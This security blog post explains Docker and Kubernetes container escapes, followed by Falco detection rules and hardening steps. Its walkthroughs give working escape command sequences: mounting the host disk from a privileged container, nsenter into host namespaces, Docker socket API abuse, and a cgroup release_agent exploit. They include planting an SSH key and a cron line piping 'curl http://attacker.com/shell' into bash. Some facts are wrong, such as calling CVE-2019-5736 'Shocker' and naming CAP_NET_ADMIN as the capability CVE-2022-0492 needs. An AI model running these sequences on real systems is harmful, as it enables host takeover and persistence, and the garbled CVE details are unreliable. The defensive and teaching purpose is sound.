What makes a container 'escape' different from a normal privilege escalation?

A container escape specifically crosses the isolation boundary between the container's isolated namespace environment and the host operating system. Unlike privilege escalation within a single OS context, a container escape allows an attacker to break out of the containerized environment entirely, gaining access to host processes, the host filesystem, and potentially other containers. The goal is to move from the restricted container namespace into the host's root namespace.

What does the --privileged Docker flag actually do?

The --privileged flag disables nearly all container isolation mechanisms simultaneously. It grants access to all Linux capabilities (including CAP_SYS_ADMIN, CAP_NET_ADMIN, CAP_SYS_PTRACE, and ~36 others), disables seccomp filtering, disables AppArmor confinement, and gives the container access to all host devices via /dev. A privileged container has essentially the same access to the host kernel as a process running directly on the host as root.

How does mounting the Docker socket inside a container enable escape?

The Docker socket (/var/run/docker.sock) is a Unix domain socket through which the Docker CLI communicates with the Docker daemon running as root on the host. If a container has this socket mounted, any process inside the container can send API requests to the Docker daemon with the same authority as root on the host. An attacker can use this to spawn a new privileged container with the host filesystem mounted, effectively gaining full root access to the host.

What was CVE-2019-5736 and which container runtimes were affected?

CVE-2019-5736 (Shocker) was a critical vulnerability in runc, the low-level container runtime used by Docker, containerd, CRI-O, and Kubernetes. It allowed a malicious container image or a container with write access to a host file to overwrite the host runc binary during container execution. Because runc runs as root on the host, this enabled full host compromise. CVSS score: 8.6. All versions of runc before 1.0-rc6 were affected. Patches were released February 11, 2019.

What is CVE-2022-0492 and how does it relate to container escape?

CVE-2022-0492 is a Linux kernel vulnerability in the cgroup v1 release_agent feature. An unprivileged user inside a container with certain conditions (user namespaces enabled, CAP_NET_ADMIN or specific cgroup mount capabilities) could abuse the cgroup release_agent mechanism to execute arbitrary commands on the host as root. CVSS score: 7.8. It affected kernel versions before 5.17-rc3 and was disclosed in March 2022.

Does Kubernetes automatically prevent container escapes?

No. Kubernetes orchestrates containers but inherits the same underlying isolation mechanisms (and weaknesses) as the container runtime. Kubernetes adds its own misconfigurations that can enable escape: hostPID: true, hostNetwork: true, hostPath volume mounts of sensitive directories, and privileged: true in pod security contexts. Pod Security Admission (replacing PodSecurityPolicy) and tools like OPA Gatekeeper can prevent these insecure pod specs from being deployed.

What is rootless Docker and does it fully prevent container escapes?

Rootless Docker runs the Docker daemon itself as a non-root user using user namespaces. This significantly reduces the impact of a container escape because the daemon process does not have host root privileges. However, rootless mode does not eliminate all escape vectors — vulnerabilities in the kernel's user namespace implementation, or misconfigurations allowing the container process to gain capabilities within the user namespace, can still lead to privilege escalation. It is a strong defense-in-depth measure, not a complete solution.

Container Escape: Breaking Out of Docker Into the Host

Containers are not virtual machines. This is one of the most consequential misunderstandings in modern infrastructure security. Where a virtual machine has a full hypervisor isolation layer separating guest and host kernels, a container shares the host kernel directly. The isolation that makes containers lightweight — Linux namespaces and cgroups — is also what makes them escapable when misconfigured or when vulnerabilities are present.

This post examines how container isolation works at the kernel level, walks through the primary escape vectors with working demonstrations, covers real CVEs that enabled escapes, and provides a concrete detection and hardening framework.

How Container Isolation Works

A container is, at its core, a process (or group of processes) on the host with a restricted view of the system. That restriction is implemented through three kernel mechanisms:

Linux Namespaces

Namespaces partition global system resources so that each container sees its own isolated instance:

Namespace	Isolates
`pid`	Process IDs — container processes cannot see host processes
`net`	Network interfaces, routing tables, iptables rules
`mnt`	Filesystem mount points
`uts`	Hostname and domain name
`ipc`	System V IPC, POSIX message queues
`user`	User and group IDs (remapped)
`cgroup`	Cgroup root directory (added in kernel 4.6)

A container escape fundamentally involves gaining access to the host’s root namespace — the namespace context shared by all host processes.

Control Groups (cgroups)

Cgroups limit resource consumption (CPU, memory, disk I/O, network) for process groups. They do not provide security isolation but they are critical for container functionality.

Linux Capabilities

Root on Linux is not monolithic. The kernel divides root’s traditional privileges into discrete capabilities: CAP_NET_BIND_SERVICE, CAP_SYS_ADMIN, CAP_CHOWN, etc. Docker drops many capabilities by default but retains a set sufficient for typical application use. The key attack surface: any capability that enables interaction with the host kernel in dangerous ways.

Escape Vector 1: Privileged Container

The most common and straightforward escape path is a container run with --privileged or with privileged: true in its Kubernetes pod spec.

Attack Flow

Attacker gains code execution inside a privileged container (RCE via web app vulnerability, supply chain attack on container image, etc.)
Container process can access all host devices via /dev
Attacker mounts the host filesystem by identifying and mounting the host’s root disk

 1# Step 1: Confirm we're in a privileged container
 2cat /proc/1/status | grep CapEff
 3# CapEff: 0000003fffffffff  (all capabilities enabled = privileged)
 4
 5# Step 2: Identify the host disk device
 6fdisk -l 2>/dev/null | grep "^Disk /dev/sd"
 7# or: lsblk
 8
 9# Step 3: Mount host root filesystem
10mkdir /tmp/hostfs
11mount /dev/sda1 /tmp/hostfs
12
13# Step 4: Chroot into host filesystem for full interactive access
14chroot /tmp/hostfs /bin/bash
15
16# Now we have a root shell on the host filesystem
17cat /etc/shadow
18ls /root/
19crontab -l  # read host cron jobs
20
21# Step 5: Persistence — add SSH key to host root
22mkdir -p /tmp/hostfs/root/.ssh
23echo "ssh-rsa AAAA...attacker_key..." >> /tmp/hostfs/root/.ssh/authorized_keys
24
25# Or write a host-level cron job
26echo "* * * * * root curl http://attacker.com/shell | bash" >> /tmp/hostfs/etc/crontab

Alternative: Privileged + nsenter

1# Use nsenter to enter host namespaces directly
2# PID 1 on the host is visible from a privileged container
3nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
4
5# This drops you into a bash shell in ALL host namespaces
6# Equivalent to running bash directly on the host
7hostname  # shows host hostname, not container hostname
8ps aux    # shows all host processes

Escape Vector 2: Docker Socket Mount

When /var/run/docker.sock is mounted inside a container, any process in that container can talk to the Docker daemon — which runs as root on the host with full container management authority.

This is extremely common in CI/CD pipelines (Jenkins, GitLab Runner, Drone) that mount the Docker socket to enable “Docker-in-Docker” builds.

Attack Flow

Attacker gains code execution inside a container with /var/run/docker.sock mounted
Docker CLI (or HTTP API via curl/python) is used to create a new container
The new container is started with privileged mode and the host filesystem mounted
Attacker executes commands in the new container to interact with the host

 1# Step 1: Verify Docker socket is available
 2ls -la /var/run/docker.sock
 3# srw-rw---- 1 root docker /var/run/docker.sock
 4
 5# Step 2: If Docker CLI is not available, use curl with Unix socket
 6curl --unix-socket /var/run/docker.sock http://localhost/version
 7
 8# Step 3a: Docker CLI approach — spawn privileged container with host fs
 9docker run -v /:/hostfs -it --privileged alpine chroot /hostfs /bin/bash
10
11# Step 3b: API approach using curl (no docker CLI required)
12# Create container
13curl --unix-socket /var/run/docker.sock \
14  -H "Content-Type: application/json" \
15  -d '{
16    "Image": "alpine",
17    "Cmd": ["/bin/sh", "-c", "chroot /hostfs cat /etc/shadow"],
18    "HostConfig": {
19      "Binds": ["/:/hostfs:rw"],
20      "Privileged": true
21    }
22  }' \
23  -X POST http://localhost/containers/create?name=escape
24
25# Start the container and get output
26curl --unix-socket /var/run/docker.sock \
27  -X POST http://localhost/containers/escape/start

Escape Vector 3: CVE-2019-5736 (runc Binary Overwrite)

CVE-2019-5736, discovered by Adam Iwaniuk and Borys Popławski, allowed a malicious container to overwrite the host runc binary and achieve code execution as root on the host.

Affected versions: runc < 1.0-rc6, Docker < 18.09.2, containerd < 1.0.3

Vulnerability mechanism: During docker exec, runc opens /proc/self/exe (which points to the runc binary on the host) via a symlink in the container filesystem. By controlling when and how this symlink resolves, the container can write to the host runc binary while it is being executed.

Conceptual Attack Flow

Attacker creates a malicious container image with a custom init binary that replaces itself with a symlink to /proc/self/exe at the right moment
When docker exec is invoked on the container, runc opens the symlink
The container replaces the symlink target with a write-open to /proc/self/exe
The container writes a malicious payload over the runc binary on the host
On the next container exec, the malicious binary runs as root on the host

 1# Detection: check runc version
 2runc --version
 3# runc version 1.0-rc6+ (patched) should show >= 1.0-rc6
 4
 5# Check Docker version (includes runc version)
 6docker version | grep -A5 "Server:"
 7
 8# Verify runc binary integrity
 9sha256sum $(which runc)
10# Compare against known-good hash from distribution vendor

Patch released: February 11, 2019. CVSS: 8.6.

Escape Vector 4: CVE-2022-0492 (cgroup v1 release_agent)

This vulnerability abused the release_agent feature in cgroup v1. When a cgroup becomes empty (all processes exit), the kernel executes the script specified in release_agent as root in the host namespace.

Conditions required for exploitation:

Container must have CAP_NET_ADMIN capability or be able to mount cgroup filesystems
cgroup v1 must be in use (not cgroup v2)
User namespaces must be available

 1# Step 1: Check if cgroup v1 is available and we can mount it
 2cat /proc/1/cgroup | head -5
 3# If output shows legacy cgroup paths (e.g., /sys/fs/cgroup/memory), cgroup v1 is active
 4
 5# Step 2: Create a new cgroup hierarchy with a release_agent
 6mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
 7mkdir /tmp/cgrp/x
 8
 9# Step 3: Set up the release_agent to write host root access
10echo 1 > /tmp/cgrp/x/notify_on_release
11host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
12echo "$host_path/exploit" > /tmp/cgrp/release_agent
13
14# Step 4: Write the payload that runs on the host
15cat > /exploit << 'EOF'
16#!/bin/sh
17ps aux > /output
18chmod 777 /output
19EOF
20chmod a+x /exploit
21
22# Step 5: Trigger cgroup empty notification by starting and killing a process
23sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs && exit"
24
25# Step 6: Read the output file that was written by the host-level release_agent
26cat /output  # Contains host process listing

Patch released: February 2022, kernel 5.17-rc3. CVSS: 7.8.

Real Incident: Docker Daemon Exposed Over TCP

In 2019, multiple cryptocurrency mining campaigns (tracked by Palo Alto Unit 42 and Aqua Security) exploited Docker daemons that had been configured to listen on TCP port 2375 without TLS authentication — a configuration explicitly warned against in Docker documentation but commonly found in development environments.

Attack pattern:

Masscan/Shodan enumeration for port 2375 open on the internet
Connection to unauthenticated Docker API: curl http://target:2375/containers/json
Deploy a new container with host / mounted
Install cryptocurrency miner (XMRig) as a persistent host process via cron or systemd

Aqua Security estimated over 400 honeypot hits per day at the peak of these campaigns in 2019. Similar attacks targeting exposed Kubernetes API servers ran in parallel.

Detection with Falco

Falco is the de facto standard for runtime security monitoring of containers. It uses eBPF or kernel module probes to detect syscall-level anomalies.

 1# /etc/falco/rules.d/container-escape.yaml
 2
 3# Detect privileged container creation
 4- rule: Create Privileged Container
 5  desc: Detect creation of a privileged container
 6  condition: >
 7    container.id != host
 8    and evt.type = container
 9    and container.privileged = true
10  output: >
11    Privileged container started (user=%user.name command=%proc.cmdline
12    container_id=%container.id image=%container.image.repository)
13  priority: WARNING
14  tags: [container, privilege-escalation, T1611]
15
16# Detect Docker socket access from within a container
17- rule: Docker Socket Accessed from Container
18  desc: Detect access to Docker socket from inside a container
19  condition: >
20    open_write
21    and container
22    and fd.name = /var/run/docker.sock
23  output: >
24    Docker socket accessed inside container (user=%user.name
25    command=%proc.cmdline container=%container.name)
26  priority: CRITICAL
27  tags: [container, escape, T1611]
28
29# Detect nsenter execution (namespace escape tool)
30- rule: nsenter Executed in Container
31  desc: Detect nsenter used to enter host namespaces
32  condition: >
33    spawned_process
34    and container
35    and proc.name = nsenter
36  output: >
37    nsenter executed in container (user=%user.name args=%proc.args
38    container=%container.name pid=%proc.pid)
39  priority: CRITICAL
40
41# Detect mount of host /proc or /dev
42- rule: Sensitive Host Filesystem Mounted
43  desc: Detect mounting of sensitive host paths
44  condition: >
45    spawned_process
46    and container
47    and proc.name = mount
48    and (proc.args contains "/proc" or proc.args contains "/dev" or proc.args contains "/sys")
49  output: >
50    Sensitive host filesystem mounted in container
51    (command=%proc.cmdline container=%container.name)
52  priority: CRITICAL

Audit Log Monitoring

 1# Kubernetes audit log: detect privileged pod creation
 2# Query audit logs for pods with privileged security context
 3cat /var/log/kubernetes/audit.log | \
 4  python3 -c "
 5import sys, json
 6for line in sys.stdin:
 7    try:
 8        event = json.loads(line)
 9        if event.get('verb') in ['create', 'update'] and \
10           event.get('objectRef', {}).get('resource') == 'pods':
11            spec = event.get('requestObject', {}).get('spec', {})
12            for container in spec.get('containers', []):
13                sc = container.get('securityContext', {})
14                if sc.get('privileged'):
15                    print(f\"ALERT: Privileged pod: {event.get('objectRef',{}).get('name')} by {event.get('user',{}).get('username')}\")
16    except:
17        pass
18"
19
20# Check Docker daemon audit logs (if auditd is configured)
21ausearch -k docker --interpret | grep -E "privileged|/var/run/docker.sock"

Defense and Hardening

Control 1: Rootless Docker

1# Install rootless Docker (requires uidmap package)
2dockerd-rootless-setuptool.sh install
3
4# Verify rootless operation
5docker info | grep "rootless"
6# Should show: rootless: true
7
8# Add to environment
9export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock

Control 2: Seccomp Profiles

Seccomp (Secure Computing Mode) restricts which syscalls a container process can make. The default Docker seccomp profile blocks ~44 syscalls. Apply stricter profiles:

 1# Apply the default seccomp profile explicitly
 2docker run --security-opt seccomp=/etc/docker/seccomp-default.json myapp
 3
 4# Use a custom profile that additionally blocks mount
 5cat > /etc/docker/seccomp-restricted.json << 'EOF'
 6{
 7  "defaultAction": "SCMP_ACT_ERRNO",
 8  "syscalls": [
 9    {
10      "names": ["mount", "umount2", "pivot_root", "clone"],
11      "action": "SCMP_ACT_ERRNO"
12    }
13  ]
14}
15EOF

Control 3: AppArmor / SELinux

 1# Verify AppArmor is active for Docker
 2docker info | grep -i apparmor
 3# Should show: Security Options: apparmor
 4
 5# Apply a custom AppArmor profile
 6cat > /etc/apparmor.d/docker-no-escape << 'EOF'
 7#include <tunables/global>
 8profile docker-no-escape flags=(attach_disconnected,mediate_deleted) {
 9  #include <abstractions/base>
10  deny mount,
11  deny /proc/sysrq-trigger rwklx,
12  deny /proc/mem rwklx,
13  deny /proc/kcore rwklx,
14  deny /sys/** wklx,
15}
16EOF
17apparmor_parser -r /etc/apparmor.d/docker-no-escape
18docker run --security-opt apparmor=docker-no-escape myapp

Control 4: Drop Capabilities and Read-Only Root Filesystem

 1# Run with minimal capabilities and read-only filesystem
 2docker run \
 3  --cap-drop ALL \
 4  --cap-add NET_BIND_SERVICE \
 5  --read-only \
 6  --tmpfs /tmp \
 7  --security-opt no-new-privileges \
 8  myapp
 9
10# Equivalent Kubernetes pod spec
11cat << 'EOF'
12securityContext:
13  runAsNonRoot: true
14  runAsUser: 1000
15  allowPrivilegeEscalation: false
16  readOnlyRootFilesystem: true
17  capabilities:
18    drop:
19      - ALL
20    add:
21      - NET_BIND_SERVICE
22EOF

Control 5: OPA Gatekeeper Policy

 1# Gatekeeper ConstraintTemplate to block privileged containers
 2apiVersion: templates.gatekeeper.sh/v1beta1
 3kind: ConstraintTemplate
 4metadata:
 5  name: k8spspprivilegedcontainer
 6spec:
 7  crd:
 8    spec:
 9      names:
10        kind: K8sPSPPrivilegedContainer
11  targets:
12    - target: admission.k8s.gatekeeper.sh
13      rego: |
14        package k8spspprivilegedcontainer
15        violation[{"msg": msg}] {
16          container := input.review.object.spec.containers[_]
17          container.securityContext.privileged == true
18          msg := sprintf("Container %v must not run as privileged", [container.name])
19        }
20---
21apiVersion: constraints.gatekeeper.sh/v1beta1
22kind: K8sPSPPrivilegedContainer
23metadata:
24  name: psp-privileged-container
25spec:
26  match:
27    kinds:
28      - apiGroups: [""]
29        kinds: ["Pod"]

MITRE ATT&CK Mapping

T1611 — Escape to Host: Adversaries may break out of a container to gain access to the host operating system.
T1610 — Deploy Container: Deploy a malicious container into a compromised environment to facilitate escape.
T1552.007 — Container API: Access container runtime APIs to gather credentials or escalate privileges.

How Container Isolation Works

Linux Namespaces

Control Groups (cgroups)

Linux Capabilities

Escape Vector 1: Privileged Container

Attack Flow

Alternative: Privileged + nsenter

Escape Vector 2: Docker Socket Mount

Attack Flow

Escape Vector 3: CVE-2019-5736 (runc Binary Overwrite)

Conceptual Attack Flow

Escape Vector 4: CVE-2022-0492 (cgroup v1 release_agent)

Real Incident: Docker Daemon Exposed Over TCP

Detection with Falco

Audit Log Monitoring

Defense and Hardening

Control 1: Rootless Docker

Control 2: Seccomp Profiles

Control 3: AppArmor / SELinux

Control 4: Drop Capabilities and Read-Only Root Filesystem

Control 5: OPA Gatekeeper Policy

MITRE ATT&CK Mapping

Related Attacks in This Series

References

Related Posts

Kubernetes RBAC Bypass: When Least Privilege Isn't Actually Configured

CISA Contractor Leaked AWS GovCloud Keys

Pack2TheRoot Linux Privilege Escalation to Root

OAuth Token Theft: Hijacking App Permissions Without Stealing Passwords

Serverless Injection: Attacking Lambda Functions Through Event Data

Cloud Account Takeover: From Leaked AWS Keys to Crypto Mining in 4 Minutes